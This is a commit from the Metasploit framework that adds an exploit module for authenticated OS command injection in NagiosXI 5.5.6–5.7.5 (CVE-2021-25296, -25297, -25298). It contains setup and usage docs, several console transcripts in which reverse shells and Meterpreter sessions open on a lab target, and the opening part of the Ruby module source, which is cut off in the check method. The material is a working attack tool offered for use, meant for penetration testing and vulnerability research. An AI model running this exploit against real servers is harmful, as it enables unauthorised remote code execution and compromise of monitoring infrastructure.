Land #17494, Add NagiosXI authenticated RCE (CVE-2021-25296, CVE-2021-25297,CVE-2021-25298) exploit module
This commit is contained in:
commit
c2e8f3fa69
|
@ -0,0 +1,451 @@
|
|||
## Vulnerable Application
|
||||
This module exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298: OS command injection vulnerabilities
|
||||
in `/nagiosxi/config/monitoringwizard.php` that enable an authenticated user to achieve remote code execution
|
||||
on NagiosXI from versions 5.5.6 to 5.7.5 as the `apache` user. There are three vulnerable configuration wizards
|
||||
(`windowswmi`, `switch`, `cloud-vm`). The `windowswmi` configuration wizard is vulnerable
|
||||
to CVE-2021-25296 via command injection in the `plugin_output_len` parameter. `switch` and
|
||||
`cloud-vm` are vulnerable to CVE-2021-25297 and CVE-2021-25298 respectively, and use the
|
||||
`ip_address` parameter, though on version 5.5.7 and prior of NagiosXI this parameter was
|
||||
named `address`.
|
||||
|
||||
The module's `check` method takes advantage of the `Msf::Exploit::Remote::HTTP::NagiosXi` mixin in order to authenticate
|
||||
to the target and obtain the version of Nagios XI installed, which is then used to check if the target is running a version
|
||||
of NagiosXI between versions 5.5.6 and 5.7.5.
|
||||
|
||||
### Installation Steps
|
||||
Note: The module can attempt to complete the configuration steps after NagiosXI has been installed.
|
||||
|
||||
#### Pre-installed OVA
|
||||
1. Download an OVA with NagiosXI installed
|
||||
1. An OVA with a vulnerable NagiosXI 5.7.5 application can be downloaded from
|
||||
Nagios [here](https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.7.5-64.ova).
|
||||
2. To download other vulnerable versions, replace the version number in the URL with the desired version.
|
||||
2. Configure the NagiosXI installation
|
||||
1. The OVA has NagiosXI running on startup. Launch the VM and visit the VM's IP in a browser.
|
||||
2. Go through defaults on the install. When you get to Admin Account Settings, configure the `nagiosadmin`
|
||||
user's password and whether you'd like to force HTTPS.
|
||||
3. Login as the `nagiosadmin` user and accept the license agreement when prompted.
|
||||
|
||||
#### Manual Install on Linux
|
||||
Note: NagiosXI can only be installed on specific operating systems (RHEL, CentOS, Oracle Linux, Debian, Ubuntu).
|
||||
Supported version numbers can be found in the installation guide
|
||||
[here](https://assets.nagios.com/downloads/nagiosxi/docs/Installing-Nagios-XI-Manually-on-Linux.pdf). Older versions of
|
||||
NagiosXI might require older versions of the operating systems mentioned. Consult the specific version's documentation if errors occur
|
||||
on newer distributions.
|
||||
|
||||
1. Download NagiosXI
|
||||
1. Choose a version between 5.5.6 and 5.7.5 from [here](https://www.nagios.com/downloads/nagios-xi/older-releases/)
|
||||
2. Install NagiosXI with the following commands
|
||||
1. `tar xzf xi-5.7.5.gz`
|
||||
2. `cd nagiosxi`
|
||||
3. `./fullinstall`
|
||||
3. Configure the NagiosXI installation
|
||||
1. Visit the installed NagiosXI application in a web browser.
|
||||
2. Go through defaults on the install. When you get to Admin Account Settings, configure the `nagiosadmin`
|
||||
user's password and whether you'd like to force HTTPS.
|
||||
3. Login as the `nagiosadmin` user and accept the license agreement when prompted.
|
||||
|
||||
### Troubleshooting Installation
|
||||
- NagiosXI doesn't show it's ip address
|
||||
- Login as the `root` user with `nagiosxi` as the password, and run `ip a` to get the IP
|
||||
- Ensure it's on a network accessible from your attacking machine (e.g. NAT network instead of Bridged)
|
||||
- NagiosXI fails when attempting to login manually with an "NSP Sorry Dave" message
|
||||
- The NagiosXI installation is likely out of sync with its date/time.
|
||||
- Set it manually with `timedatectl set-ntp false` and `timedatectl set-time '2023-02-06 17:34:00'` but with the actual time and date
|
||||
|
||||
## Verification Steps
|
||||
- [ ] Start `msfconsole`
|
||||
- [ ] `use exploit/linux/http/nagios_xi_configwizards_authenticated_rce`
|
||||
- [ ] `set RHOSTS TARGET_IP`
|
||||
- [ ] `set RPORT 443`
|
||||
- [ ] `set SSL true`
|
||||
- [ ] `set USERNAME USER`
|
||||
- [ ] `set PASSWORD PASSWORD`
|
||||
- [ ] `set TARGET_CVE CVE-2021-25296`
|
||||
- [ ] `set LHOST YOUR_IP`
|
||||
- [ ] `set LPORT YOUR_LISTENING_PORT`
|
||||
- [ ] `run`
|
||||
|
||||
## Options
|
||||
|
||||
### USERNAME
|
||||
A valid NagiosXI username, which can be for an administrator or regular user.
|
||||
|
||||
### PASSWORD
|
||||
The password for the provided NagiosXI username.
|
||||
|
||||
### TARGET_CVE
|
||||
The CVE to target. Each CVE corresponds to a specific target:
|
||||
- CVE-2021-25296: `windowswmi` configuration wizard RCE via the `plugin_output_len` URL parameter
|
||||
- CVE-2021-25297: `switch` configuration wizard RCE via the `ip_address` URL parameter.
|
||||
Note that on versions 5.5.7 and prior this parameter is named `address` instead.
|
||||
- CVE-2021-25298: `cloud-vm` configuration wizard RCE via the `ip_address` URL parameter.
|
||||
Note that on versions 5.5.7 and prior this parameter is named `address` instead.
|
||||
|
||||
Note that CVE-2021-25298 is in the `cloud-vm` configuration wizard but we set the `wizard`
|
||||
URL parameter value to `digitalocean` in order to make sure we use this wizard; there are
|
||||
potentially other values that could be used here.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### CentOS7 Running NagiosXI 5.7.5 (Official OVA) - CVE-2021-25296
|
||||
```
|
||||
msf6 > use exploit/linux/http/nagios_xi_configwizards_authenticated_rce
|
||||
[*] Using configured payload cmd/unix/reverse_perl_ssl
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOST 192.168.153.132
|
||||
RHOST => 192.168.153.132
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LHOST 192.168.153.128
|
||||
LHOST => 192.168.153.128
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set FINISH_INSTALL true
|
||||
FINISH_INSTALL => true
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set USERNAME nagiosadmin
|
||||
USERNAME => nagiosadmin
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set PASSWORD nagiosadmin
|
||||
PASSWORD => nagiosadmin
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOST 192.168.153.132
|
||||
RHOST => 192.168.153.132
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LHOST 192.168.153.128
|
||||
LHOST => 192.168.153.128
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set FIN
|
||||
set FINGERPRINTCHECK set FINISH_INSTALL
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set FINISH_INSTALL true
|
||||
FINISH_INSTALL => true
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > show options
|
||||
|
||||
Module options (exploit/linux/http/nagios_xi_configwizards_authenticated_rce):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FINISH_INSTALL true no If the Nagios XI installation has not been completed,
|
||||
try to do so. This includes signing the license agreem
|
||||
ent.
|
||||
PASSWORD nagiosadmin no Password to authenticate with
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port
|
||||
][...]
|
||||
RHOSTS 192.168.153.132 yes The target host(s), see https://github.com/rapid7/meta
|
||||
sploit-framework/wiki/Using-Metasploit
|
||||
RPORT 80 yes The target port (TCP)
|
||||
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This
|
||||
must be an address on the local machine or 0.0.0.0 to
|
||||
listen on all addresses.
|
||||
SRVPORT 8080 yes The local port to listen on.
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
SSLCert no Path to a custom SSL certificate (default is randomly
|
||||
generated)
|
||||
TARGETURI /nagiosxi/ yes The base path to the Nagios XI application
|
||||
TARGET_CVE CVE-2021-25296 yes CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE
|
||||
-2021-25298)
|
||||
URIPATH no The URI to use for this exploit (default is random)
|
||||
USERNAME nagiosadmin no Username to authenticate with
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (cmd/unix/reverse_perl_ssl):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST 192.168.153.128 yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
2 CMD
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > exploit
|
||||
|
||||
[*] Started reverse SSL handler on 192.168.153.128:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Attempting to authenticate to Nagios XI...
|
||||
[!] The target seems to be a Nagios XI application that has not been fully installed yet.
|
||||
[*] Attempting to finish the Nagios XI installation on the target using the provided password. The username will be `nagiosadmin`.
|
||||
[*] Attempting to authenticate to Nagios XI...
|
||||
[!] The Nagios XI license agreement has not yet been signed on the target.
|
||||
[*] Attempting to sign the Nagios XI license agreement...
|
||||
[*] License agreement signed. The module will wait for 5 seconds and retry the login.
|
||||
[*] Attempting to authenticate to Nagios XI...
|
||||
[+] Successfully authenticated to Nagios XI.
|
||||
[*] Target is Nagios XI with version 5.7.5.
|
||||
[+] The target appears to be vulnerable.
|
||||
[*] Sending the payload...
|
||||
[*] Command shell session 1 opened (192.168.153.128:4444 -> 192.168.153.132:56222) at 2023-02-07 11:33:53 -0600
|
||||
|
||||
id
|
||||
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
|
||||
pwd
|
||||
/usr/local/nagiosxi/html/config
|
||||
uname -a
|
||||
Linux localhost.localdomain 3.10.0-1160.2.2.el7.x86_64 #1 SMP Tue Oct 20 16:53:08 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
|
||||
```
|
||||
|
||||
### CentOS7 Running NagiosXI 5.7.5 (Official OVA) - CVE-2021-25297
|
||||
```
|
||||
msf6 > use exploit/linux/http/nagios_xi_configwizards_authenticated_rce
|
||||
[*] Using configured payload cmd/unix/reverse_perl_ssl
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOST 192.168.153.132
|
||||
RHOST => 192.168.153.132
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LHOST 192.168.153.128
|
||||
LHOST => 192.168.153.128
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set USERNAME nagiosadmin
|
||||
USERNAME => nagiosadmin
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set PASSWORD nagiosadmin
|
||||
PASSWORD => nagiosadmin
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > show options
|
||||
|
||||
Module options (exploit/linux/http/nagios_xi_configwizards_authenticated_rce):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FINISH_INSTALL false no If the Nagios XI installation has not been completed,
|
||||
try to do so. This includes signing the license agreem
|
||||
ent.
|
||||
PASSWORD nagiosadmin no Password to authenticate with
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port
|
||||
][...]
|
||||
RHOSTS 192.168.153.132 yes The target host(s), see https://github.com/rapid7/meta
|
||||
sploit-framework/wiki/Using-Metasploit
|
||||
RPORT 80 yes The target port (TCP)
|
||||
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This
|
||||
must be an address on the local machine or 0.0.0.0 to
|
||||
listen on all addresses.
|
||||
SRVPORT 8080 yes The local port to listen on.
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
SSLCert no Path to a custom SSL certificate (default is randomly
|
||||
generated)
|
||||
TARGETURI /nagiosxi/ yes The base path to the Nagios XI application
|
||||
TARGET_CVE CVE-2021-25296 yes CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE
|
||||
-2021-25298)
|
||||
URIPATH no The URI to use for this exploit (default is random)
|
||||
USERNAME nagiosadmin no Username to authenticate with
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (cmd/unix/reverse_perl_ssl):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST 192.168.153.128 yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
2 CMD
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set TARGET_CVE CVE-2021-25297
|
||||
TARGET_CVE => CVE-2021-25297
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > exploit
|
||||
|
||||
[*] Started reverse SSL handler on 192.168.153.128:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Attempting to authenticate to Nagios XI...
|
||||
[+] Successfully authenticated to Nagios XI.
|
||||
[*] Target is Nagios XI with version 5.7.5.
|
||||
[+] The target appears to be vulnerable.
|
||||
[*] Sending the payload...
|
||||
[*] Command shell session 1 opened (192.168.153.128:4444 -> 192.168.153.132:56322) at 2023-02-07 11:44:00 -0600
|
||||
|
||||
id
|
||||
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
|
||||
whoami
|
||||
apache
|
||||
uname -a
|
||||
Linux localhost.localdomain 3.10.0-1160.2.2.el7.x86_64 #1 SMP Tue Oct 20 16:53:08 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
|
||||
```
|
||||
|
||||
### CentOS7 Running NagiosXI 5.7.5 (Official OVA) - CVE-2021-25298
|
||||
```
|
||||
msf6 > use exploit/linux/http/nagios_xi_configwizards_authenticated_rce
|
||||
[*] Using configured payload cmd/unix/reverse_perl_ssl
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set USERNAME nagiosadmin
|
||||
USERNAME => nagiosadmin
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set PASSWORD nagiosadmin
|
||||
PASSWORD => nagiosadmin
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set TARGET_CVE CVE-2021-25298
|
||||
TARGET_CVE => CVE-2021-25298
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LHOST 192.168.153.128
|
||||
LHOST => 192.168.153.128
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOST 192.168.153.132
|
||||
RHOST => 192.168.153.132
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set TARGET Linux\ (x64)
|
||||
TARGET => Linux (x64)
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > show options
|
||||
|
||||
Module options (exploit/linux/http/nagios_xi_configwizards_authenticated_rce):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FINISH_INSTALL false no If the Nagios XI installation has not been completed,
|
||||
try to do so. This includes signing the license agreem
|
||||
ent.
|
||||
PASSWORD nagiosadmin no Password to authenticate with
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port
|
||||
][...]
|
||||
RHOSTS 192.168.153.132 yes The target host(s), see https://github.com/rapid7/meta
|
||||
sploit-framework/wiki/Using-Metasploit
|
||||
RPORT 80 yes The target port (TCP)
|
||||
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This
|
||||
must be an address on the local machine or 0.0.0.0 to
|
||||
listen on all addresses.
|
||||
SRVPORT 8080 yes The local port to listen on.
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
SSLCert no Path to a custom SSL certificate (default is randomly
|
||||
generated)
|
||||
TARGETURI /nagiosxi/ yes The base path to the Nagios XI application
|
||||
TARGET_CVE CVE-2021-25298 yes CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE
|
||||
-2021-25298)
|
||||
URIPATH no The URI to use for this exploit (default is random)
|
||||
USERNAME nagiosadmin no Username to authenticate with
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (linux/x64/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST 192.168.153.128 yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
1 Linux (x64)
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LPORT 9912
|
||||
LPORT => 9912
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set FINISH_INSTALL true
|
||||
FINISH_INSTALL => true
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.153.128:9912
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Attempting to authenticate to Nagios XI...
|
||||
[!] The target seems to be a Nagios XI application that has not been fully installed yet.
|
||||
[*] Attempting to finish the Nagios XI installation on the target using the provided password. The username will be `nagiosadmin`.
|
||||
[*] Attempting to authenticate to Nagios XI...
|
||||
[!] The Nagios XI license agreement has not yet been signed on the target.
|
||||
[*] Attempting to sign the Nagios XI license agreement...
|
||||
[*] License agreement signed. The module will wait for 5 seconds and retry the login.
|
||||
[*] Attempting to authenticate to Nagios XI...
|
||||
[+] Successfully authenticated to Nagios XI.
|
||||
[*] Target is Nagios XI with version 5.7.5.
|
||||
[+] The target appears to be vulnerable.
|
||||
[*] Sending the payload...
|
||||
[*] Sending stage (3045348 bytes) to 192.168.153.132
|
||||
[*] Meterpreter session 1 opened (192.168.153.128:9912 -> 192.168.153.132:32878) at 2023-02-07 11:48:50 -0600
|
||||
|
||||
[*] Command Stager progress - 100.00% done (833/833 bytes)
|
||||
|
||||
meterpreter >
|
||||
meterpreter > getuid
|
||||
Server username: apache
|
||||
meterpreter > getprivs
|
||||
[-] The "getprivs" command is not supported by this Meterpreter type (x64/linux)
|
||||
meterpreter > sysinfo
|
||||
Computer : localhost.localdomain
|
||||
OS : CentOS 7.9.2009 (Linux 3.10.0-1160.2.2.el7.x86_64)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
meterpreter > pwd
|
||||
/usr/local/nagiosxi/html/config
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
### CentOS7 Running NagiosXI 5.5.6 (Official OVA) - CVE-2021-25297
|
||||
```
|
||||
msf6 > use exploit/linux/http/nagios_xi_configwizards_authenticated_rce
|
||||
[*] Using configured payload cmd/unix/reverse_perl_ssl
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOSTS 192.168.104.18
|
||||
RHOSTS => 192.168.104.18
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RPORT 443
|
||||
RPORT => 443
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set SSL true
|
||||
[!] Changing the SSL option's value may require changing RPORT!
|
||||
SSL => true
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set PASSWORD nagiosadmin
|
||||
PASSWORD => nagiosadmin
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set TARGET_CVE CVE-2021-25297
|
||||
TARGET_CVE => CVE-2021-25297
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LHOST 192.168.104.2
|
||||
LHOST => 192.168.104.2
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LPORT 8443
|
||||
LPORT => 8443
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > show options
|
||||
|
||||
Module options (exploit/linux/http/nagios_xi_configwizards_authenticated_rce):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FINISH_INSTALL false no If the Nagios XI installation has not been completed, try to do so. This includes signin
|
||||
g the license agreement.
|
||||
PASSWORD nagiosadmin no Password to authenticate with
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS 192.168.104.18 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasp
|
||||
loit
|
||||
RPORT 443 yes The target port (TCP)
|
||||
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local m
|
||||
achine or 0.0.0.0 to listen on all addresses.
|
||||
SRVPORT 8080 yes The local port to listen on.
|
||||
SSL true no Negotiate SSL/TLS for outgoing connections
|
||||
SSLCert no Path to a custom SSL certificate (default is randomly generated)
|
||||
TARGETURI /nagiosxi/ yes The base path to the Nagios XI application
|
||||
TARGET_CVE CVE-2021-25297 yes CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298)
|
||||
URIPATH no The URI to use for this exploit (default is random)
|
||||
USERNAME nagiosadmin no Username to authenticate with
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (cmd/unix/reverse_perl_ssl):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST 192.168.104.2 yes The listen address (an interface may be specified)
|
||||
LPORT 8443 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
2 CMD
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > exploit
|
||||
|
||||
[*] Started reverse SSL handler on 192.168.104.2:8443
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Attempting to authenticate to Nagios XI...
|
||||
[+] Successfully authenticated to Nagios XI.
|
||||
[*] Target is Nagios XI with version 5.5.6.
|
||||
[+] The target appears to be vulnerable.
|
||||
[*] Sending the payload...
|
||||
[*] Command shell session 1 opened (192.168.104.2:8443 -> 192.168.104.18:58930) at 2023-02-07 14:27:41 -0500
|
||||
id
|
||||
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
|
||||
whoami
|
||||
apache
|
||||
uname -a
|
||||
Linux localhost.localdomain 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
|
||||
```
|
|
@ -0,0 +1,272 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::Remote::HTTP::NagiosXi
|
||||
include Msf::Exploit::CmdStager
|
||||
prepend Msf::Exploit::Remote::AutoCheck
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection',
|
||||
'Description' => %q{
|
||||
This module exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298, which are
|
||||
OS command injection vulnerabilities in the windowswmi, switch, and cloud-vm
|
||||
configuration wizards that allow an authenticated user to perform remote code
|
||||
execution on Nagios XI versions 5.5.6 to 5.7.5 as the apache user.
|
||||
|
||||
Valid credentials for a Nagios XI user are required. This module has
|
||||
been successfully tested against official NagiosXI OVAs from 5.5.6-5.7.5.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
'Matthew Mathur'
|
||||
],
|
||||
'References' => [
|
||||
['CVE', '2021-25296'],
|
||||
['CVE', '2021-25297'],
|
||||
['CVE', '2021-25298'],
|
||||
['URL', 'https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md']
|
||||
],
|
||||
'Platform' => %w[linux unix],
|
||||
'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
|
||||
'Targets' => [
|
||||
[
|
||||
'Linux (x86)', {
|
||||
'Arch' => [ ARCH_X86 ],
|
||||
'Platform' => 'linux',
|
||||
'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
|
||||
}
|
||||
],
|
||||
[
|
||||
'Linux (x64)', {
|
||||
'Arch' => [ ARCH_X64 ],
|
||||
'Platform' => 'linux',
|
||||
'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
|
||||
}
|
||||
],
|
||||
[
|
||||
'CMD', {
|
||||
'Arch' => [ ARCH_CMD ],
|
||||
'Platform' => 'unix',
|
||||
# the only reliable payloads against a typical Nagios XI host (CentOS 7 minimal) seem to be cmd/unix/reverse_perl_ssl and cmd/unix/reverse_openssl
|
||||
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl' }
|
||||
}
|
||||
]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DefaultTarget' => 2,
|
||||
'DisclosureDate' => '2021-02-13',
|
||||
'Notes' => {
|
||||
'Stability' => [ CRASH_SAFE ],
|
||||
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
|
||||
'Reliability' => [ REPEATABLE_SESSION ]
|
||||
}
|
||||
)
|
||||
)
|
||||
|
||||
register_options [
|
||||
OptString.new('TARGET_CVE', [true, 'CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298)', 'CVE-2021-25296'])
|
||||
]
|
||||
end
|
||||
|
||||
def username
|
||||
datastore['USERNAME']
|
||||
end
|
||||
|
||||
def password
|
||||
datastore['PASSWORD']
|
||||
end
|
||||
|
||||
def finish_install
|
||||
datastore['FINISH_INSTALL']
|
||||
end
|
||||
|
||||
# Returns a status code an a error message on failure.
|
||||
# On success returns the status code and an array so we
|
||||
# can update the login_result and res_array variables appropriately.
|
||||
def handle_unsigned_license(res_array, username, password, finish_install)
|
||||
auth_cookies, nsp = res_array
|
||||
sign_license_result = sign_license_agreement(auth_cookies, nsp)
|
||||
if sign_license_result
|
||||
return 5, 'Failed to sign license agreement'
|
||||
end
|
||||
|
||||
print_status('License agreement signed. The module will wait for 5 seconds and retry the login.')
|
||||
sleep 5
|
||||
login_result, res_array = login_after_install_or_license(username, password, finish_install)
|
||||
case login_result
|
||||
when 1..4 # An error occurred, propagate the error message
|
||||
return login_result, res_array[0]
|
||||
when 5 # The Nagios XI license agreement still has not been signed
|
||||
return 5, 'Failed to sign the license agreement.'
|
||||
end
|
||||
|
||||
return login_result, res_array
|
||||
end
|
||||
|
||||
def authenticate
|
||||
# Use nagios_xi_login to try and authenticate.
|
||||
login_result, res_array = nagios_xi_login(username, password, finish_install)
|
||||
case login_result
|
||||
when 1..3 # An error occurred, propagate the error message
|
||||
return login_result, res_array[0]
|
||||
when 4 # Nagios XI is not fully installed
|
||||
install_result = install_nagios_xi(password)
|
||||
if install_result # On installation failure, result is an array with the code and error message
|
||||
return install_result[0], install_result[1]
|
||||
end
|
||||
|
||||
login_result, res_array = login_after_install_or_license(username, password, finish_install)
|
||||
case login_result
|
||||
when 1..4 # An error occurred, propagate the error message
|
||||
return login_result, res_array[0]
|
||||
when 5 # The license agreement still needs to be signed
|
||||
login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
|
||||
return login_result, res_array unless (login_result == 0)
|
||||
end
|
||||
when 5 # The license agreement still needs to be signed
|
||||
login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
|
||||
return login_result, res_array unless (login_result == 0)
|
||||
end
|
||||
|
||||
print_good('Successfully authenticated to Nagios XI.')
|
||||
# Extract the authenticated cookies and nsp to use throughout the module
|
||||
if res_array.length == 2
|
||||
auth_cookies = res_array[1]
|
||||
if auth_cookies && /nagiosxi=[a-z0-9]+;/.match(auth_cookies)
|
||||
@auth_cookies = auth_cookies
|
||||
else
|
||||
return login_result, 'Failed to extract authentication cookies'
|
||||
end
|
||||
nsp = res_array[0].match(/nsp_str = "([a-z0-9]+)/)
|
||||
if nsp
|
||||
@nsp = nsp[1]
|
||||
else
|
||||
return login_result, 'Failed to extract nsp string'
|
||||
end
|
||||
else
|
||||
return login_result, 'Failed to extract auth cookies and nsp string'
|
||||
end
|
||||
|
||||
# Set the version here so both check and exploit can use it
|
||||
nagios_version = nagios_xi_version(res_array[0])
|
||||
if nagios_version.nil?
|
||||
return 6, 'Unable to obtain the Nagios XI version from the dashboard'
|
||||
end
|
||||
|
||||
print_status("Target is Nagios XI with version #{nagios_version}.")
|
||||
|
||||
# Versions of NagiosXI pre-5.2 have different formats (5r1.0, 2014r2.7, 2012r2.8b, etc.) that Rex cannot handle,
|
||||
# so we set pre-5.2 versions to 1.0.0 for easier Rex comparison because the module only works on post-5.2 versions.
|
||||
if /^\d{4}r\d(?:\.\d)?(?:(?:RC\d)|(?:[a-z]{1,3}))?$/.match(nagios_version) || nagios_version == '5r1.0'
|
||||
nagios_version = '1.0.0'
|
||||
end
|
||||
@version = Rex::Version.new(nagios_version)
|
||||
|
||||
return 0, 'Successfully authenticated and retrieved NagiosXI Version.'
|
||||
end
|
||||
|
||||
def check
|
||||
# Authenticate to ensure we can access the NagiosXI version
|
||||
auth_result, err_msg = authenticate
|
||||
case auth_result
|
||||
when 1
|
||||
return CheckCode::Unknown(err_msg)
|
||||
when 2, 4, 5, 6
|
||||
return CheckCode::Detected(err_msg)
|
||||
when 3
|
||||
return CheckCode::Safe(err_msg)
|
||||
end
|
||||
|
||||
